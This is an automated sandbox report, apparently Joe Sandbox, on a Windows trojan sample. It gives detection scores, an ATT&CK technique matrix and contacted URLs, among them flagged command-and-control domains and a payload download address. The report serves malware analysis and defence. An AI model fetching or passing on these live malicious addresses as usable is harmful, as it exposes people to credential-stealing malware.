    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_004163DA GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,0_2_004163DA
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
    Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_004218BC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_004218BC
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_00420BE6 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_00420BE6
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_02121B23 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_02121B23
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_02120E4D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_02120E4D
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
    Native API
    1
    DLL Side-Loading
    11
    Process Injection
    1
    Masquerading
    OS Credential Dumping1
    System Time Discovery
    Remote Services1
    Screen Capture
    11
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    PowerShell
    Boot or Logon Initialization Scripts1
    DLL Side-Loading
    1
    Virtualization/Sandbox Evasion
    LSASS Memory1
    Query Registry
    Remote Desktop Protocol1
    Archive Collected Data
    12
    Ingress Tool Transfer
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
    Process Injection
    Security Account Manager131
    Security Software Discovery
    SMB/Windows Admin Shares3
    Clipboard Data
    2
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
    Deobfuscate/Decode Files or Information
    NTDS1
    Virtualization/Sandbox Evasion
    Distributed Component Object ModelInput Capture123
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script4
    Obfuscated Files or Information
    LSA Secrets1
    Process Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts22
    Software Packing
    Cached Domain Credentials1
    Application Window Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    DLL Side-Loading
    DCSync2
    File and Directory Discovery
    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem24
    System Information Discovery
    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    L7GNkeVm5e.exe39%VirustotalBrowse
    L7GNkeVm5e.exe50%ReversingLabsWin32.Trojan.CrypterX
    L7GNkeVm5e.exe100%AviraHEUR/AGEN.1312567
    L7GNkeVm5e.exe100%Joe Sandbox ML
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Temp\EB86.tmp.exe100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe50%ReversingLabsWin32.Trojan.CrypterX
    C:\Users\user\AppData\Local\Temp\EB86.tmp.exe50%ReversingLabsWin32.Trojan.CrypterX
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://robinsharez.shop:443/api100%Avira URL Cloudmalware
    https://post-to-me.com/fh/0100%Avira URL Cloudmalware
    http://176.113.115.19/ScreenUpdateSync.exe5h48t4j4t1rrSOFTWARE0%Avira URL Cloudsafe
    https://versersleep.shop:443/api100%Avira URL Cloudmalware
    https://chipdonkeruz.shop:443/apih100%Avira URL Cloudmalware
    https://crowdwarek.shop:443/api100%Avira URL Cloudmalware
    http://176.113.115.19/ScreenUpdateSync.exe(0%Avira URL Cloudsafe
    https://apporholis.shop:443/apiiP100%Avira URL Cloudmalware
    https://skidjazzyric.click:443/api100%Avira URL Cloudmalware
    NameIPActiveMaliciousAntivirus DetectionReputation
    post-to-me.com
    172.67.179.207
    truefalse
      high
      steamcommunity.com
      104.102.49.254
      truefalse
        high
        femalsabler.shop
        unknown
        unknownfalse
          high
          robinsharez.shop
          unknown
          unknownfalse
            high
            soundtappysk.shop
            unknown
            unknownfalse
              high
              crowdwarek.shop
              unknown
              unknownfalse
                high
                versersleep.shop
                unknown
                unknownfalse
                  high
                  skidjazzyric.click
                  unknown
                  unknownfalse
                    high
                    chipdonkeruz.shop
                    unknown
                    unknownfalse
                      high
                      apporholis.shop
                      unknown
                      unknownfalse
                        high
                        handscreamny.shop
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          robinsharez.shopfalse
                            high
                            crowdwarek.shopfalse
                              high
                              skidjazzyric.clickfalse
                                high
                                femalsabler.shopfalse
                                  high
                                  https://steamcommunity.com/profiles/76561199724331900false
                                    high
                                    soundtappysk.shopfalse
                                      high
                                      apporholis.shopfalse
                                        high
                                        chipdonkeruz.shopfalse
                                          high
                                          versersleep.shopfalse
                                            high
                                            https://post-to-me.com/track_prt.php?sub=0&cc=DEfalse
                                              high
                                              handscreamny.shopfalse
                                                high
                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngEB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://player.vimeo.comEB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://steamcommunity.com/?subsection=broadcastsEB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.microsoft.coEB86.tmp.exe, 00000002.00000003.2167698252.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://community.fastly.steamstatic.com/public/css/applications/community/mEB86.tmp.exe, 00000002.00000002.2358880463.000000000064B000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168246436.0000000000648000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168282667.000000000064A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://store.steampowered.com/subscriber_agreement/EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://www.gstatic.cn/recaptcha/EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://176.113.115.19/ScreenUpdateSync.exeL7GNkeVm5e.exe, L7GNkeVm5e.exe, 00000000.00000003.4407193910.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, L7GNkeVm5e.exe, 00000000.00000002.4539968169.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, L7GNkeVm5e.exe, 00000000.00000003.4407439602.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.valvesoftware.com/legal.htmEB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.youtube.comEB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.google.comEB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://176.113.115.19/ScreenUpdateSync.exe5h48t4j4t1rrSOFTWAREL7GNkeVm5e.exe, 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://post-to-me.com/fh/0L7GNkeVm5e.exe, 00000000.00000003.4407193910.00000000006A4000.00000004.00000020.00020000.00000000.sdmp, L7GNkeVm5e.exe, 00000000.00000002.4539850806.00000000006A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackEB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.0000000000656000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.0000000000656000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=englEB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCEB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://s.ytimg.com;EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.0000000000656000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://community.fastly.steamstatic.com/EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://community.fastly.steamstatic.com/public/css/skin_1/fatalerror.css?v=OFUqlcDNiD6y&l=engliEB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://steam.tv/EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://versersleep.shop:443/apiEB86.tmp.exe, 00000002.00000002.2358896798.000000000065A000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.000000000065A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: malware
                                                                                            unknown
                                                                                            https://post-to-me.com/track_prt.php?sub=&cc=DEL7GNkeVm5e.exe, 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
                                                                                              high
                                                                                              http://store.steampowered.com/privacy_agreement/EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.0000000000656000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://store.steampowered.com/points/shop/EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://sketchfab.comEB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://lv.queniujq.cnEB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://www.youtube.com/EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://store.steampowered.com/privacy_agreement/EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=M_FULq_AEB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.0000000000656000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://post-to-me.com/track_prt.php?sub=L7GNkeVm5e.exefalse
                                                                                                              high
                                                                                                              https://robinsharez.shop:443/apiEB86.tmp.exe, 00000002.00000002.2358896798.000000000065A000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.000000000065A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: malware
                                                                                                              unknown
                                                                                                              https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&amEB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://www.google.com/recaptcha/EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://checkout.steampowered.com/EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://chipdonkeruz.shop:443/apihEB86.tmp.exe, 00000002.00000002.2358896798.000000000065A000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.000000000065A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: malware
                                                                                                                    unknown
                                                                                                                    https://post-to-me.com/L7GNkeVm5e.exe, 00000000.00000003.4407193910.00000000006A4000.00000004.00000020.00020000.00000000.sdmp, L7GNkeVm5e.exe, 00000000.00000002.4539850806.00000000006A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://store.steampowered.com/;EB86.tmp.exe, 00000002.00000003.2167698252.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167928507.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://store.steampowered.com/about/EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://steamcommunity.com/my/wishlist/EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://help.steampowered.com/en/EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://steamcommunity.com/market/EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://store.steampowered.com/news/EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://steamcommunity.com/profiles/76561199724331900$EB86.tmp.exe, 00000002.00000002.2358896798.000000000065A000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.000000000065A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://store.steampowered.com/subscriber_agreement/EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.0000000000656000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgEB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.0000000000656000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://recaptcha.net/recaptcha/;EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=enEB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://steamcommunity.com/discussions/EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://store.steampowered.com/stats/EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amEB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://medal.tvEB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://broadcast.st.dl.eccdnx.comEB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngEB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&aEB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://store.steampowered.com/steam_refunds/EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://crowdwarek.shop:443/apiEB86.tmp.exe, 00000002.00000002.2358896798.000000000065A000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.000000000065A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                              unknown
                                                                                                                                                              https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
